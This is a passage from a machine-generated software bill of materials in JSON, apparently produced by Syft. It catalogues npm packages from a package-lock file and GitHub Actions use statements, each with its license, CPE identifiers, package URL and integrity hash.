":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-shape@3.1.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz","integrity":"sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w==","dependencies":{"@types/d3-path":"*"}}},{"id":"d051a01827d6eb95","name":"@types/d3-time","version":"3.0.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-time@3.0.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz","integrity":"sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g==","dependencies":null}},{"id":"a9187c78265f1b66","name":"@types/d3-timer","version":"3.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/d3-timer@3.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz","integrity":"sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==","dependencies":null}},{"id":"bbe9092f97742247","name":"@types/jsonwebtoken","version":"9.0.10","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/jsonwebtoken:\\@types\\/jsonwebtoken:9.0.10:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/jsonwebtoken@9.0.10","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz","integrity":"sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA==","dependencies":{"@types/ms":"*","@types/node":"*"}}},{"id":"69a126982af5137d","name":"@types/long","version":"4.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/long:\\@types\\/long:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/long@4.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz","integrity":"sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==","dependencies":null}},{"id":"fa54533e742eac71","name":"@types/ms","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/ms:\\@types\\/ms:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/ms@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz","integrity":"sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA==","dependencies":null}},{"id":"c19052194c7f9053","name":"@types/node","version":"20.19.39","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/node:\\@types\\/node:20.19.39:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/node@20.19.39","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz","integrity":"sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw==","dependencies":{"undici-types":"~6.21.0"}}},{"id":"b0b14dd646c615be","name":"@types/node","version":"22.19.17","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/node:\\@types\\/node:22.19.17:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/node@22.19.17","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz","integrity":"sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==","dependencies":{"undici-types":"~6.21.0"}}},{"id":"656ffeda0aaf4e8b","name":"@types/request","version":"2.48.13","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/request:\\@types\\/request:2.48.13:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/request@2.48.13","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz","integrity":"sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg==","dependencies":{"@types/caseless":"*","@types/node":"*","@types/tough-cookie":"*","form-data":"^2.5.5"}}},{"id":"cf24fb05ea581070","name":"@types/tough-cookie","version":"4.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/tough:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@types\\/tough:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/tough-cookie@4.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz","integrity":"sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==","dependencies":null}},{"id":"919683ef9260890b","name":"@types/ws","version":"8.18.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@types\\/ws:\\@types\\/ws:8.18.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40types/ws@8.18.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz","integrity":"sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==","dependencies":{"@types/node":"*"}}},{"id":"0277554910df9b38","name":"abbrev","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/abbrev@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz","integrity":"sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ==","dependencies":null}},{"id":"02974b3dbbe4d3d6","name":"abort-controller","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/abort-controller@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz","integrity":"sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==","dependencies":{"event-target-shim":"^5.0.0"}}},{"id":"2eb8f1fab63663a1","name":"abs-svg-path","version":"0.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/abs-svg-path@0.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz","integrity":"sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA==","dependencies":null}},{"id":"e96668e505272792","name":"accepts","version":"1.3.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/accepts@1.3.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz","integrity":"sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==","dependencies":{"mime-types":"~2.1.34","negotiator":"0.6.3"}}},{"id":"b54bfb1da26ce9cd","name":"actions/checkout","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","accessPath":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v2"}},{"id":"8939931398f7f376","name":"actions/checkout","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/busboy/.github/workflows/ci.yml","accessPath":"/node_modules/busboy/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v2"}},{"id":"9ed4a1365893a541","name":"actions/checkout","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/busboy/.github/workflows/lint.yml","accessPath":"/node_modules/busboy/.github/workflows/lint.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v2"}},{"id":"bf473f4674a4b4c1","name":"actions/checkout","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/streamsearch/.github/workflows/ci.yml","accessPath":"/node_modules/streamsearch/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v2"}},{"id":"7ec5891cc205a593","name":"actions/checkout","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/streamsearch/.github/workflows/lint.yml","accessPath":"/node_modules/streamsearch/.github/workflows/lint.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v2"}},{"id":"8effbdc22037c585","name":"actions/checkout","version":"v3","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/stream-shift/.github/workflows/test.yml","accessPath":"/node_modules/stream-shift/.github/workflows/test.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v3","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v3"}},{"id":"fd10fce47017fa13","name":"actions/checkout","version":"v4","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/reusify/.github/workflows/ci.yml","accessPath":"/node_modules/reusify/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/checkout:actions\\/checkout:v4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/checkout@v4","metadataType":"github-actions-use-statement","metadata":{"value":"actions/checkout@v4"}},{"id":"6b0792dcccc67817","name":"actions/setup-node","version":"v1","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/busboy/.github/workflows/ci.yml","accessPath":"/node_modules/busboy/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v1","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v1"}},{"id":"0dc9162b75e9df6b","name":"actions/setup-node","version":"v1","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/busboy/.github/workflows/lint.yml","accessPath":"/node_modules/busboy/.github/workflows/lint.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v1","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v1"}},{"id":"303b3812127b618f","name":"actions/setup-node","version":"v1","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/streamsearch/.github/workflows/ci.yml","accessPath":"/node_modules/streamsearch/.github/workflows/ci.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v1","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v1"}},{"id":"5dcd76ce8f7aa30c","name":"actions/setup-node","version":"v1","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/streamsearch/.github/workflows/lint.yml","accessPath":"/node_modules/streamsearch/.github/workflows/lint.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v1","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v1"}},{"id":"94c6b30301562d90","name":"actions/setup-node","version":"v2","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","accessPath":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v2","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v2"}},{"id":"c1170e00c0039987","name":"actions/setup-node","version":"v3","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/stream-shift/.github/workflows/test.yml","accessPath":"/node_modules/stream-shift/.github/workflows/test.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup-node:v3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup-node:actions\\/setup_node:v3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup-node:v3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup_node:actions\\/setup_node:v3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup-node:v3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:actions\\/setup:actions\\/setup_node:v3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/actions/setup-node@v3","metadataType":"github-actions-use-statement","metadata":{"value":"actions/setup-node@v3"}},{"id":